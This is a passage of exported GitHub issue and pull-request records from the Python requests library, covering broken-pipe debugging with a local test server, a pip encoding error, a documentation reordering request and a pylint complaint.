order to get a clean stack trace.\n", "@jazzfan thanks for doing that. I'll look tonight and I suspect that @Lukasa will look when he wakes up\n", "@sigmavirus24 You forget that I am in NYC at the minute, and so am (relatively) awake!\n\nAs I've said elsewhere, EPIPE almost always comes when we attempt to send on a connection that has been remote-closed.\n\nI think it would be most interesting if you could run a patch in requests' vendored copy of urllib3 that would throw the socket object up with the `ConnectionError`, and then read from it. The exact patch to apply here is a bit unclear and overlaps with some other stuff we've been thinking about when it comes to EPIPE.\n\nAlternatively, a non-SSL repro would work!\n", "@Lukasa, does this mean that the SSL tcpdump file is essentially useless? Also, I'm afraid I'm too much of a newbie to be able to figure this patch you're describing, especially if it's unclear to you. \n\nI guess I'll rig up some kind of little test HTTP server on my localhost and see if I can reproduce the error using that.\n", "@JazzFan Sadly, it's not very easy to tell from it whether or not a response was sent. That said, we can definitely see that the remote end tore the connection down at 15:17:24.141410 (sending a TCP FIN). Shortly thereafter we emitted another packet, which caused the remote end to send a barrage of TCP RSTs (though most of these appear to be retransmits, and in practice appear to be in response to the other TCP packets that were in flight when the FIN was emitted (as shown by the sequence/acknowledgement numbers).\n\nWhat we really want to understand is what triggered the connection teardown.\n", "@Lukasa \n\nWell, one thing is clear - it happens only when large amounts of data (files) and transferred.\n", "@barseghyanartur Yup, but that doesn't necessarily mean much. 
You can only get an EPIPE if the remote end forcibly closes the connection, which is only likely to happen for large data files.\n", "@Lukasa \n\nAre you interested to know what happens if 20 Mb plain text (textarea) is posted?\n", "I'm really interested in seeing something happening here in plaintext. =D\n", "Well, for whatever reason I just can't get tcpdump to actually capture the packets. I get output like this:\n\n```\n0 packets captured\n303 packets received by filter\n0 packets dropped by kernel\n```\n\nBut this example breaks for me, again with Python 2.7.8 and requests 2.5.3:\n\n```\n#!/usr/bin/env python\n\nimport requests\n\nline = '.' * 79 + '\\n'\ndata = line * 10000000\nresponse = requests.post('http://127.0.0.1:8000', data=data)\nprint(response)\n```\n\nHere is the stack trace (again with home dir redacted as `~`):\n\n```\n$ ./requests_test.py \nTraceback (most recent call last):\n File \"./requests_test.py\", line 7, in <module>\n response = requests.post('http://127.0.0.1:8000', data=data)\n File \"~/anaconda/envs/py278/lib/python2.7/site-packages/requests/api.py\", line 99, in post\n return request('post', url, data=data, json=json, **kwargs)\n File \"~/anaconda/envs/py278/lib/python2.7/site-packages/requests/api.py\", line 49, in request\n response = session.request(method=method, url=url, **kwargs)\n File \"~/anaconda/envs/py278/lib/python2.7/site-packages/requests/sessions.py\", line 461, in request\n resp = self.send(prep, **send_kwargs)\n File \"~/anaconda/envs/py278/lib/python2.7/site-packages/requests/sessions.py\", line 573, in send\n r = adapter.send(request, **kwargs)\n File \"~/anaconda/envs/py278/lib/python2.7/site-packages/requests/adapters.py\", line 415, in send\n raise ConnectionError(err, request=request)\nrequests.exceptions.ConnectionError: ('Connection aborted.', error(32, 'Broken pipe'))\n```\n\nI can capture the packets with Wireshark. 
I know that you're looking for a particular kind of plaintext output from tcpdump, but would you happen to know how to get the equivalent plaintext output from Wireshark? \nOn the off chance that it would work for you, I've created a gist, wireshark.txt, https://gist.github.com/JazzFan/8517983ff5eed2d95b10.\n", "@JazzFan In addition to what you sent me I need the actual packet data. There's a 40-byte TCP payload coming from your server in frame 60 that Wireshark is claiming is HTTP data, but it hasn't broken out the data itself so I can't see it.\n\nWhat tcpdump command are you running?\n", "I'm running\n\n```\nsudo tcpdump -nnvvXSs 1514 port 8000 and host 127.0.0.1 > tcpdump.txt\n```\n\nand variations on that (e.g., omitting the `and host 127.0.0.1`). After triggering the bug in another window and hitting `Ctrl-C` on the `tcpdump` command, I get something like\n\n```\n0 packets captured\n492 packets received by filter\n0 packets dropped by kernel\n```\n\nand an empty tcpdump.txt file. I interpret the output to mean that the filter saw the packets but didn't capture them, but I don't know why it didn't capture them.\n", "Also, FWIW, the 40 bytes of TCP data payload on packet 60 are\n\n```\n<html><body><h1>POST!</h1></body></html>\n```\n\nThis is just the standard response that my dummy HTTP server makes to any post request. 
FWIW, here is my HTTP server:\n\n``` python\n#!/usr/bin/env python\n\"\"\"\n\nVery simple HTTP server in python.\n\nUsage::\n ./dummy-web-server.py [<port>]\n\nSend a GET request::\n curl http://localhost\n\nSend a HEAD request::\n curl -I http://localhost\n\nSend a POST request::\n curl -d \"foo=bar&bin=baz\" http://localhost\n\n\"\"\"\nfrom BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer\nimport SocketServer\n\n\nclass S(BaseHTTPRequestHandler):\n def _set_headers(self):\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n def do_GET(self):\n self._set_headers()\n self.wfile.write(\"<html><body><h1>hi!</h1></body></html>\")\n\n def do_HEAD(self):\n self._set_headers()\n\n def do_POST(self):\n # Doesn't do anything with posted data\n self._set_headers()\n self.wfile.write(\"<html><body><h1>POST!</h1></body></html>\")\n\n\ndef run(server_class=HTTPServer, handler_class=S, port=8000):\n server_address = ('', port)\n httpd = server_class(server_address, handler_class)\n print 'Starting httpd...'\n httpd.serve_forever()\n\n\nif __name__ == \"__main__\":\n from sys import argv\n\n if len(argv) == 2:\n run(port=int(argv[1]))\n else:\n run()\n```\n", "Oops, I forgot to include @Lukasa in my previous comments.\n" ]
https://api.github.com/repos/psf/requests/issues/2421
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2421/labels{/name}
https://api.github.com/repos/psf/requests/issues/2421/comments
https://api.github.com/repos/psf/requests/issues/2421/events
https://github.com/psf/requests/issues/2421
55,242,976
MDU6SXNzdWU1NTI0Mjk3Ng==
2,421
Quoted newlines not handled properly
{ "avatar_url": "https://avatars.githubusercontent.com/u/942461?v=4", "events_url": "https://api.github.com/users/jrootham/events{/privacy}", "followers_url": "https://api.github.com/users/jrootham/followers", "following_url": "https://api.github.com/users/jrootham/following{/other_user}", "gists_url": "https://api.github.com/users/jrootham/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/jrootham", "id": 942461, "login": "jrootham", "node_id": "MDQ6VXNlcjk0MjQ2MQ==", "organizations_url": "https://api.github.com/users/jrootham/orgs", "received_events_url": "https://api.github.com/users/jrootham/received_events", "repos_url": "https://api.github.com/users/jrootham/repos", "site_admin": false, "starred_url": "https://api.github.com/users/jrootham/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/jrootham/subscriptions", "type": "User", "url": "https://api.github.com/users/jrootham", "user_view_type": "public" }
[]
closed
true
null
[]
null
4
2015-01-23T04:06:42Z
2021-09-08T23:06:03Z
2015-01-23T15:36:40Z
NONE
resolved
When trying to use iter_lines() reader for csv to read an parse a csv file it failed. It turns out that if there is a quoted newline in the file it removes the comma quote delimiter for the quoted newline and the following line. This makes it impossible to use iter_lines for csv.
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2421/reactions" }
https://api.github.com/repos/psf/requests/issues/2421/timeline
null
completed
null
null
false
[ "## Can you use a paste servIce to give a concrete example of this? I'm not sure I follow your description \n\nSent from my Android device with K-9 Mail. Please excuse my brevity.\n", "Input file:\n \"a\",\"\n \",\"b\"\n \"c\",\"\n \",\"d\"\n\nOutput stings\n \"a\"\n \"c\"\n", "I don't see how this is iter_lines' fault. It doesn't understand file formats, so it can't possibly know that it's in a CSV file and so that newlines can be quoted. It's not \"iter_semantic_lines\", and nor should it be. In this situation, you want to use iter_content.\n", "Sorry, it looks like my fault. I was faked out by my data source providing 2 different files with identical identifying headers.\n" ]
https://api.github.com/repos/psf/requests/issues/2420
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2420/labels{/name}
https://api.github.com/repos/psf/requests/issues/2420/comments
https://api.github.com/repos/psf/requests/issues/2420/events
https://github.com/psf/requests/pull/2420
55,242,311
MDExOlB1bGxSZXF1ZXN0Mjc4OTk2NjY=
2,420
Replace n-dash in HISTORY to workaround pip bug
{ "avatar_url": "https://avatars.githubusercontent.com/u/665269?v=4", "events_url": "https://api.github.com/users/chriskuehl/events{/privacy}", "followers_url": "https://api.github.com/users/chriskuehl/followers", "following_url": "https://api.github.com/users/chriskuehl/following{/other_user}", "gists_url": "https://api.github.com/users/chriskuehl/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/chriskuehl", "id": 665269, "login": "chriskuehl", "node_id": "MDQ6VXNlcjY2NTI2OQ==", "organizations_url": "https://api.github.com/users/chriskuehl/orgs", "received_events_url": "https://api.github.com/users/chriskuehl/received_events", "repos_url": "https://api.github.com/users/chriskuehl/repos", "site_admin": false, "starred_url": "https://api.github.com/users/chriskuehl/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/chriskuehl/subscriptions", "type": "User", "url": "https://api.github.com/users/chriskuehl", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2015-01-23T03:54:12Z
2021-09-08T09:01:01Z
2015-01-23T07:19:39Z
CONTRIBUTOR
resolved
There exists a problem (maybe a bug?) in pip when using a locale like `LC_ALL=C` (which is commonly used by CI environments and system configuration tools such as Puppet), where the PKG-INFO file is decoded using ascii, raising a UnicodeDecodeError when PKG-INFO contains non-ASCII characters (such as the n-dash removed by this commit): ``` Downloading/unpacking requests from https://pypi.python.org/packages/source/r/requests/requests-2.5.1.tar.gz Downloading requests-2.5.1.tar.gz (443Kb): 443Kb downloaded Running setup.py egg_info for package requests Exception: Traceback (most recent call last): File "/usr/lib/python3/dist-packages/pip/basecommand.py", line 104, in main status = self.run(options, args) File "/usr/lib/python3/dist-packages/pip/commands/install.py", line 245, in run requirement_set.prepare_files(finder, force_root_egg_info=self.bundle, bundle=self.bundle) File "/usr/lib/python3/dist-packages/pip/req.py", line 1014, in prepare_files req_to_install.assert_source_matches_version() File "/usr/lib/python3/dist-packages/pip/req.py", line 359, in assert_source_matches_version version = self.installed_version File "/usr/lib/python3/dist-packages/pip/req.py", line 351, in installed_version return self.pkg_info()['version'] File "/usr/lib/python3/dist-packages/pip/req.py", line 318, in pkg_info data = self.egg_info_data('PKG-INFO') File "/usr/lib/python3/dist-packages/pip/req.py", line 261, in egg_info_data data = fp.read() File "/usr/lib/python3.2/encodings/ascii.py", line 26, in decode return codecs.ascii_decode(input, self.errors)[0] UnicodeDecodeError: 'ascii' codec can't decode byte 0xe2 in position 8161: ordinal not in range(128) ``` There are some existing issues for pip: - pypa/pip#1233 - pypa/pip#761 Other projects have had the same issue occur; there is some useful discussion in these issues as well: - cleder/fastkml#9 - gabrielfalcao/HTTPretty#108 - rbarrois/factory_boy#118 I know this isn't really a problem with requests (and should probably be 
addressed ultimately in pip), but I think replacing this character in HISTORY would be a pain-free and pragmatic way to help developers and system administrators, especially given the inactivity on the pip bug reports. Many thanks!
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2420/reactions" }
https://api.github.com/repos/psf/requests/issues/2420/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2420.diff", "html_url": "https://github.com/psf/requests/pull/2420", "merged_at": "2015-01-23T07:19:39Z", "patch_url": "https://github.com/psf/requests/pull/2420.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2420" }
true
[ "Yeah, I'm just sick of this now. Thanks! :cake:\n", "This is the second time these have snuck in. Where are they coming from? Do we think this closes #2419?\n", "I hope so.\n" ]
https://api.github.com/repos/psf/requests/issues/2419
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2419/labels{/name}
https://api.github.com/repos/psf/requests/issues/2419/comments
https://api.github.com/repos/psf/requests/issues/2419/events
https://github.com/psf/requests/issues/2419
55,033,747
MDU6SXNzdWU1NTAzMzc0Nw==
2,419
UnicodeDecodeError installing via pip-3.2
{ "avatar_url": "https://avatars.githubusercontent.com/u/858881?v=4", "events_url": "https://api.github.com/users/TFenby/events{/privacy}", "followers_url": "https://api.github.com/users/TFenby/followers", "following_url": "https://api.github.com/users/TFenby/following{/other_user}", "gists_url": "https://api.github.com/users/TFenby/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/TFenby", "id": 858881, "login": "TFenby", "node_id": "MDQ6VXNlcjg1ODg4MQ==", "organizations_url": "https://api.github.com/users/TFenby/orgs", "received_events_url": "https://api.github.com/users/TFenby/received_events", "repos_url": "https://api.github.com/users/TFenby/repos", "site_admin": false, "starred_url": "https://api.github.com/users/TFenby/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/TFenby/subscriptions", "type": "User", "url": "https://api.github.com/users/TFenby", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2015-01-21T15:32:05Z
2021-09-08T23:04:52Z
2015-05-03T15:08:23Z
NONE
resolved
So here's a weird one. I have a Docker container based on debian:stable where I install python3 and python3-pip, and when trying to install requests from a requirements.txt file I get the following: ``` Downloading/unpacking requests (from -r /tmp/requirements/xxx.txt (line 2)) Running setup.py egg_info for package requests Exception: Traceback (most recent call last): File "/usr/lib/python3/dist-packages/pip/basecommand.py", line 104, in main status = self.run(options, args) File "/usr/lib/python3/dist-packages/pip/commands/install.py", line 245, in run requirement_set.prepare_files(finder, force_root_egg_info=self.bundle, bundle=self.bundle) File "/usr/lib/python3/dist-packages/pip/req.py", line 1014, in prepare_files req_to_install.assert_source_matches_version() File "/usr/lib/python3/dist-packages/pip/req.py", line 359, in assert_source_matches_version version = self.installed_version File "/usr/lib/python3/dist-packages/pip/req.py", line 351, in installed_version return self.pkg_info()['version'] File "/usr/lib/python3/dist-packages/pip/req.py", line 318, in pkg_info data = self.egg_info_data('PKG-INFO') File "/usr/lib/python3/dist-packages/pip/req.py", line 261, in egg_info_data data = fp.read() File "/usr/lib/python3.2/encodings/ascii.py", line 26, in decode return codecs.ascii_decode(input, self.errors)[0] UnicodeDecodeError: 'ascii' codec can't decode byte 0xe2 in position 8161: ordinal not in range(128) ``` However, when I run `pip-3.2 install requests` directly, it works fine. I honestly have no idea where even to start on debugging this.
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2419/reactions" }
https://api.github.com/repos/psf/requests/issues/2419/timeline
null
completed
null
null
false
[ "This is a duplicate of an old error that was fixed. Can you confirm that the version of requests is pinned to something in the 2.x line but is not 2.5.1?\n", "#2196 is the already fixed issue for reference.\n", "I've tried it with no version pinned, pinned to 2.5.1, and pinned to 2.5.0.\nThe thing that I don't understand is why it only fails when installing from a requirements.txt file. \n" ]
https://api.github.com/repos/psf/requests/issues/2418
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2418/labels{/name}
https://api.github.com/repos/psf/requests/issues/2418/comments
https://api.github.com/repos/psf/requests/issues/2418/events
https://github.com/psf/requests/issues/2418
54,997,272
MDU6SXNzdWU1NDk5NzI3Mg==
2,418
Data argument introduced too early in Quickstart guide
{ "avatar_url": "https://avatars.githubusercontent.com/u/3679615?v=4", "events_url": "https://api.github.com/users/alfonsomhc/events{/privacy}", "followers_url": "https://api.github.com/users/alfonsomhc/followers", "following_url": "https://api.github.com/users/alfonsomhc/following{/other_user}", "gists_url": "https://api.github.com/users/alfonsomhc/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/alfonsomhc", "id": 3679615, "login": "alfonsomhc", "node_id": "MDQ6VXNlcjM2Nzk2MTU=", "organizations_url": "https://api.github.com/users/alfonsomhc/orgs", "received_events_url": "https://api.github.com/users/alfonsomhc/received_events", "repos_url": "https://api.github.com/users/alfonsomhc/repos", "site_admin": false, "starred_url": "https://api.github.com/users/alfonsomhc/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/alfonsomhc/subscriptions", "type": "User", "url": "https://api.github.com/users/alfonsomhc", "user_view_type": "public" }
[ { "color": "0b02e1", "default": false, "description": null, "id": 191274, "name": "Contributor Friendly", "node_id": "MDU6TGFiZWwxOTEyNzQ=", "url": "https://api.github.com/repos/psf/requests/labels/Contributor%20Friendly" } ]
closed
true
null
[]
null
8
2015-01-21T09:45:56Z
2021-09-08T23:05:53Z
2015-03-15T18:39:54Z
NONE
resolved
I'm following the quick start guide in: http://docs.python-requests.org/en/latest/user/quickstart/ I got confused when reading the section "Custom Headers" because the example code features the data argument, which hasn't been introduced in the guide yet (it is the next section "More complicated POST requests" that describes the data argument). My suggestion is to swap the order of those two sections, i.e. have "More complicated POST requests" before "Custom Headers", or modify the example code in "Custom Headers" (remove data argument).
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2418/reactions" }
https://api.github.com/repos/psf/requests/issues/2418/timeline
null
completed
null
null
false
[ "Agreed, this should be reworked. Marking as contributor friendly.\n", "Why not just leave out the data argument in the Custom Headers section? That section is clearly not meant to explain the usage of data argument. It is being discussed later on in the \"More complicated POST requests\" section. What do you guys say?\n", "The only reason to worry about it is that the header we're sending is a `Content-Type` one, which does rather require a body. \n", "Let's just set it to a useragent string then?\n", "Totally reasonable. =)\n", "Should I go ahead and submit a patch?\n\n## Outline:\n- Omit the data attribute.\n- Replace the headers with a user-agent string\n", "Make sure you change the verb, but sure. =)\n", "The full user-agent string is too long:\n`Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36`. Can I just write `Mozilla/5.0` or is it necessary to write the complete user-agent string?\n" ]
https://api.github.com/repos/psf/requests/issues/2417
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2417/labels{/name}
https://api.github.com/repos/psf/requests/issues/2417/comments
https://api.github.com/repos/psf/requests/issues/2417/events
https://github.com/psf/requests/issues/2417
54,903,649
MDU6SXNzdWU1NDkwMzY0OQ==
2,417
pylint friendly
{ "avatar_url": "https://avatars.githubusercontent.com/u/5856387?v=4", "events_url": "https://api.github.com/users/DavidHwu/events{/privacy}", "followers_url": "https://api.github.com/users/DavidHwu/followers", "following_url": "https://api.github.com/users/DavidHwu/following{/other_user}", "gists_url": "https://api.github.com/users/DavidHwu/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/DavidHwu", "id": 5856387, "login": "DavidHwu", "node_id": "MDQ6VXNlcjU4NTYzODc=", "organizations_url": "https://api.github.com/users/DavidHwu/orgs", "received_events_url": "https://api.github.com/users/DavidHwu/received_events", "repos_url": "https://api.github.com/users/DavidHwu/repos", "site_admin": false, "starred_url": "https://api.github.com/users/DavidHwu/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/DavidHwu/subscriptions", "type": "User", "url": "https://api.github.com/users/DavidHwu", "user_view_type": "public" }
[]
closed
true
null
[]
null
11
2015-01-20T16:21:35Z
2021-09-08T05:00:40Z
2015-01-20T16:51:45Z
NONE
resolved
Kindly request that requests be more pylint compliant. When evaluating which package to use, this comes up with a score of -154. ## Global evaluation Your code has been rated at -154.92/10 (previous run: -154.91/10, -0.00) Errors: Davids-MacBook-Pro-2:~ dhwu$ pylint -E /Users/dhwu/Desktop/Evals/HTTP\ Libs/requests-2.5.1/requests No config file found, using default configuration ************\* Module requests.compat E: 88, 4: No name 'quote' in module 'urllib' (no-name-in-module) E: 88, 4: No name 'unquote' in module 'urllib' (no-name-in-module) E: 88, 4: No name 'quote_plus' in module 'urllib' (no-name-in-module) E: 88, 4: No name 'unquote_plus' in module 'urllib' (no-name-in-module) E: 88, 4: No name 'urlencode' in module 'urllib' (no-name-in-module) E: 88, 4: No name 'getproxies' in module 'urllib' (no-name-in-module) E: 88, 4: No name 'proxy_bypass' in module 'urllib' (no-name-in-module) E: 98,10: Undefined variable 'unicode' (undefined-variable) E: 99,17: Using variable 'basestring' before assignment (used-before-assignment) E:100,26: Undefined variable 'long' (undefined-variable) ************\* Module requests.models E: 39,10: Instance of 'LookupDict' has no 'moved' member (no-member) E: 40,10: Instance of 'LookupDict' has no 'found' member (no-member) E: 41,10: Instance of 'LookupDict' has no 'other' member (no-member) E: 42,10: Instance of 'LookupDict' has no 'temporary_redirect' member (no-member) E: 43,10: Instance of 'LookupDict' has no 'permanent_redirect' member (no-member) E:343,18: Undefined variable 'unicode' (undefined-variable) E:634,74: Instance of 'LookupDict' has no 'moved_permanently' member (no-member) E:634,99: Instance of 'LookupDict' has no 'permanent_redirect' member (no-member) E:792,51: Instance of 'bool' has no 'decode' member (no-member) ************\* Module requests.sessions E:145,42: Instance of 'LookupDict' has no 'see_other' member (no-member) E:151,41: Instance of 'LookupDict' has no 'found' member (no-member) E:156,41: Instance 
of 'LookupDict' has no 'moved' member (no-member) E:162,46: Instance of 'LookupDict' has no 'temporary_redirect' member (no-member) E:162,72: Instance of 'LookupDict' has no 'permanent_redirect' member (no-member) ************\* Module requests.utils E:537,52: Module 'sys' has no 'pypy_version_info' member (no-member) E:538,52: Module 'sys' has no 'pypy_version_info' member (no-member) E:539,52: Module 'sys' has no 'pypy_version_info' member (no-member) E:540,15: Module 'sys' has no 'pypy_version_info' member (no-member) E:541,76: Module 'sys' has no 'pypy_version_info' member (no-member) ************\* Module requests.packages.chardet E: 23,52: Undefined variable 'unicode' (undefined-variable) ************\* Module requests.packages.chardet.compat E: 25,21: Undefined variable 'unicode' (undefined-variable) ************\* Module requests.packages.urllib3.connection E:159, 0: class already defined line 20 (function-redefined) ************\* Module requests.packages.urllib3.connectionpool E: 46,19: Instance of '_MovedItems' has no 'xrange' member (no-member) ************\* Module requests.packages.urllib3.request E: 4, 4: No name 'urlencode' in module 'urllib' (no-name-in-module) E: 49, 8: NotImplemented raised - should raise NotImplementedError (notimplemented-raised) ************\* Module requests.packages.urllib3.response E:182,36: Instance of 'str' has no 'read' member (no-member) E:186,36: Instance of 'str' has no 'read' member (no-member) E:195,33: Instance of 'str' has no 'close' member (no-member) E:296,21: Instance of 'str' has no 'close' member (no-member) E:303,28: Instance of 'str' has no 'closed' member (no-member) E:305,28: Instance of 'str' has no 'isclosed' member (no-member) E:313,28: Instance of 'str' has no 'fileno' member (no-member) E:320,28: Instance of 'str' has no 'flush' member (no-member) ************\* Module requests.packages.urllib3.contrib.ntlmpool E: 44,13: Instance of 'NTLMConnectionPool' has no 'num_connections' member (no-member) E: 
46,24: Instance of 'NTLMConnectionPool' has no 'num_connections' member (no-member) E: 46,46: Instance of 'NTLMConnectionPool' has no 'host' member (no-member) E: 53,41: Instance of 'NTLMConnectionPool' has no 'host' member (no-member) E: 53,57: Instance of 'NTLMConnectionPool' has no 'port' member (no-member) ************\* Module requests.packages.urllib3.contrib.pyopenssl E: 58, 0: No name '_fileobject' in module 'socket' (no-name-in-module) E:158,33: Instance of 'OctetString' has no 'getComponentByPosition' member (no-member) E:158,33: Instance of 'Any' has no 'getComponentByPosition' member (no-member) E:158,33: Instance of 'str' has no 'getComponentByPosition' member (no-member) ************\* Module requests.packages.urllib3.packages.ordered_dict E: 82,35: Instance of 'dict' has no 'itervalues' member (no-member) E:142, 4: Method has no argument (no-method-argument) E:165,29: Instance of 'tuple' has no 'keys' member (no-member) ************\* Module requests.packages.urllib3.packages.six E: 42,19: Undefined variable 'basestring' (undefined-variable) E: 43,26: Undefined variable 'long' (undefined-variable) E: 44,31: Module 'types' has no 'ClassType' member (no-member) E: 45,16: Undefined variable 'unicode' (undefined-variable) E: 84,22: Instance of '_LazyDescr' has no '_resolve' member (no-member) E:294,15: Undefined variable 'unicode' (undefined-variable) E:341,36: Undefined variable 'basestring' (undefined-variable) E:347,31: Undefined variable 'unicode' (undefined-variable) E:353,31: Undefined variable 'unicode' (undefined-variable) E:361,35: Undefined variable 'unicode' (undefined-variable) E:365,22: Undefined variable 'unicode' (undefined-variable) E:366,20: Undefined variable 'unicode' (undefined-variable) ************\* Module requests.packages.urllib3.util.connection E: 87, 8: Raising NoneType while only classes or instances are allowed (raising-bad-type) ************\* Module requests.packages.urllib3.util.ssl_ E: 22, 4: No name 'OP_NO_SSLv2' in 
module 'ssl' (no-name-in-module) E: 22, 4: No name 'OP_NO_SSLv3' in module 'ssl' (no-name-in-module) E: 22, 4: No name 'OP_NO_COMPRESSION' in module 'ssl' (no-name-in-module) E: 41, 4: class already defined line 7 (function-redefined) Davids-MacBook-Pro-2:~ dhwu$
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2417/reactions" }
https://api.github.com/repos/psf/requests/issues/2417/timeline
null
completed
null
null
false
[ "Opening this kind of issue is exactly the kind of thing that is likely to get you some very negative comments indeed. =) Offering criticism without offering to help improve it is extremely bad manners. It's worse when the criticism is of the form \"Your project doesn't live up to my personal standard <x>\" as this is. It's worse still when your criticism is based on an automated tool that is _wrong_.\n\nAllow me to pick some examples:\n\n> E: 88, 4: No name 'quote' in module 'urllib' (no-name-in-module)\n\nThat's only true in Python 3, and the whole purpose of this module is to cover over differences between Python 2 and 3. All these errors are wrong.\n\n> E: 39,10: Instance of 'LookupDict' has no 'moved' member (no-member)\n\nStatic analysis of Python is _stupid_: it's a dynamic language! In practice, the instance gains this member at import time: any tool smart enough to import the module would have known this. These errors are all wrong.\n\n> E:537,52: Module 'sys' has no 'pypy_version_info' member (no-member)\n\nIt does on PyPy. Given that this is guarded by an 'if pypy' check, this error and all the ones like it are wrong.\n\n> E: 23,52: Undefined variable 